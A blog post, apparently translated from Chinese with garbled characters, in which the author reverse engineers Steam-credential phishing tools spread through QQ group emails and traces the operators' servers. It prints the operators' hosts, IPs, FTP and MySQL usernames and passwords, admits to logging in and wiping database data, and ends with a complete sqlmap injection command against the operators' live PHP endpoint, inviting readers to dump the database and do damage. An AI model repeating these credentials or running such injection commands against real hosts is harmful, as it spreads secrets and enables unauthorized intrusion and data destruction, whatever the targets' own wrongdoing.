Screenshots
At some point, QQ group emails became an excellent venue for spreading phishing software, with things like âCute Girl Voice Changerâ and âCrack UU Accelerator.â Whenever I get bored, I download these and spend a few minutes reverse engineering them. I find that phishing software always embeds the serverâs account passwords into the software. Now, letâs take a closer look at this situation.
Firstly, these phishing applications steal Steam account credentials by overlaying controls and uploading authorization files starting with ssfn to bypass Steamâs security verification to the virus authorâs server.

This file

Control overlay
As you can see, the two input boxes and the login button here arenât Steamâs original ones. Theyâre floating in empty space.
Then, by exploiting a fast âvulnerabilityâ in Tencent, specifically using âlocalhost.ptlogin2.qq.com,â it collects cookies and tokens related to login information, enabling mass email distribution. Many people have discussed this, and itâs quite simple. Thereâs plenty of information available online, so I wonât go into further detail. Below is an image, with the circled part being the strings associated with bulk email distribution.

String extraction
Among them, http://www.laohe788.com/zhuti.txt is the email subject. http://www.laohe788.com/zhengwen.txt is the email content.
So many phishing applications, Iâve briefly analyzed and somewhat witnessed the authorâs growth. Around January 9th, the author transmitted stolen account information via direct remote access to MySQL. SQL statements were executed to achieve this. The MySQL account password was not stored in plaintext, making it invisible through IDA string extraction but visible through Huorong Sword or Wireshark packet capture.

Huorong Sword screenshot
However, according to the MySQL protocol, passwords are not transmitted in plaintext. So, debugging with OD, I acquired the following account password:

OD call stack
Server address host1.webhostidc.netâs IP at the time was: 103.234.97.196
Account and database name both were: a1214170409. Password was: 7a7ef802
Here are some screenshots from back then:

Screenshots
I helped clear out the database a bit and left it be.
Next, from January 16th, the author switched to PHP receiving. I thought he wised upâŠand wouldnât put his account passwords in the program again, but to transfer the Steam ssfn authorization file, he still embedded his FTP account password in the programâŠ

image.png
At this time, his information was as follows: Server address: host1.webhostidc.net Receiving URL: www.sk404.com/muma/jianpanjilu.php Account: yy4961627321 Password: C7A1E537B84be3 There were no screenshots at that time. Itâs changed now.
Then letâs directly look at recent updates, February 17th (This one isnât available anymore) FTP server address: host1.webhostidc.net Receiving URL: http://www.laopohehe.top/muma/jianpanjilu.php Password: U2z3H7X6 Account: laopoheheda There are many more, not enumerating each one, but itâs the same author with stubbornness⊠Occasionally adding a Super-EC or a shell. But still writing account passwords into the program. mdzz.
Letâs see the latest (February 27th). FTP server: host1.webhostidc.net Account: laopoheheda Password: D3271E5EFD05d6 FTP logging in reveals that this zzâs FTP server, MySQL server, and HTTP server are the same machine, and FTP access allows viewing of all php files on the HTTP server. Checking config.php, we can see MySQLâs account password.

config.php
Another recent one. Server: 103.214.169.225 Account: laopohehe Password: U2z3H7X6 This oneâs database account password is the same.
Judging by these names, it can be confirmed that itâs a group committing crimes. Hopefully, this information exposure increases their crime costs.
Thereâs no technical depthâŠbasically IDA or Huorong Sword can reveal stringsâŠ
No Account Passwords in Phishing Software
Letâs look at something with a bit more technical depth.
Take www.lanzouyundown.comâs example of âApex Legends Origin Speed Limit Removal.â Extracting strings didnât reveal any account password strings because it uses the Super-EC module internally. Suspicious of decryption occurring midway, I used Ollydbg for debugging and Wireshark for packet capturing. [Wireshark image]

Packet capture image
In this HTTP request, âshuju1â represents the ssfn name (then name and pass, I tentatively guess, are used to distinguish which subordinate stole it, as data can be directly retrieved from this on the webpage), as for shuju4? Seeing no FTP-related traffic and nothing found during debugging, could this be the hexadecimal representation of the ssfn file? Using 010editor to open the local ssfn file,

010editor
it matches the content of the âshuju4â field in the traffic packet.
In other words, the author has finally stopped using FTP to transfer files.
This requires a different approach. Scanning the main site (www.sk408.com) with AWVS and Yujian scanner revealed a system based on DedeCMS, version V57_SP2. After finding related vulnerabilities, the member feature was disabled, negating exploitation success. A simple backend scan didnât uncover much, and attempts to brute force backend vulnerabilities seemed already patched.
The authorâs PHP file for recording data is www.sk408.com/muma/jianpanjilu.php Using previous PHP files obtained from FTP, we could perform a simple code audit.

jianpanjilu.php source code
The SQL statements are assembled with no checks or filters.
Go directly with sqlmap, all-in-one.
â`htmlâ`javascriptâ`sqlmap -u âhttp://www.sk408.com/muma/jianpanjilu.phpâ âdata âname=123&pass=123&username=qwe&password=qwe&ip=2.2.2.2&shuju1=123&shuju2=qwe&shuju3=qweâ âtamper=space2comment ârandom-agent âlevel 3 âdbsâ`

Database information
â`htmlâ`javascriptâ`web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17â`
The database account is shikong@%, but not with DBA privileges. So passwords canât be read. However, dumping the database is possible, as well as causing some damage. Iâm not interested in this⊠Feel free to experiment.
If other vulnerabilities are found, please feel free to exchange information.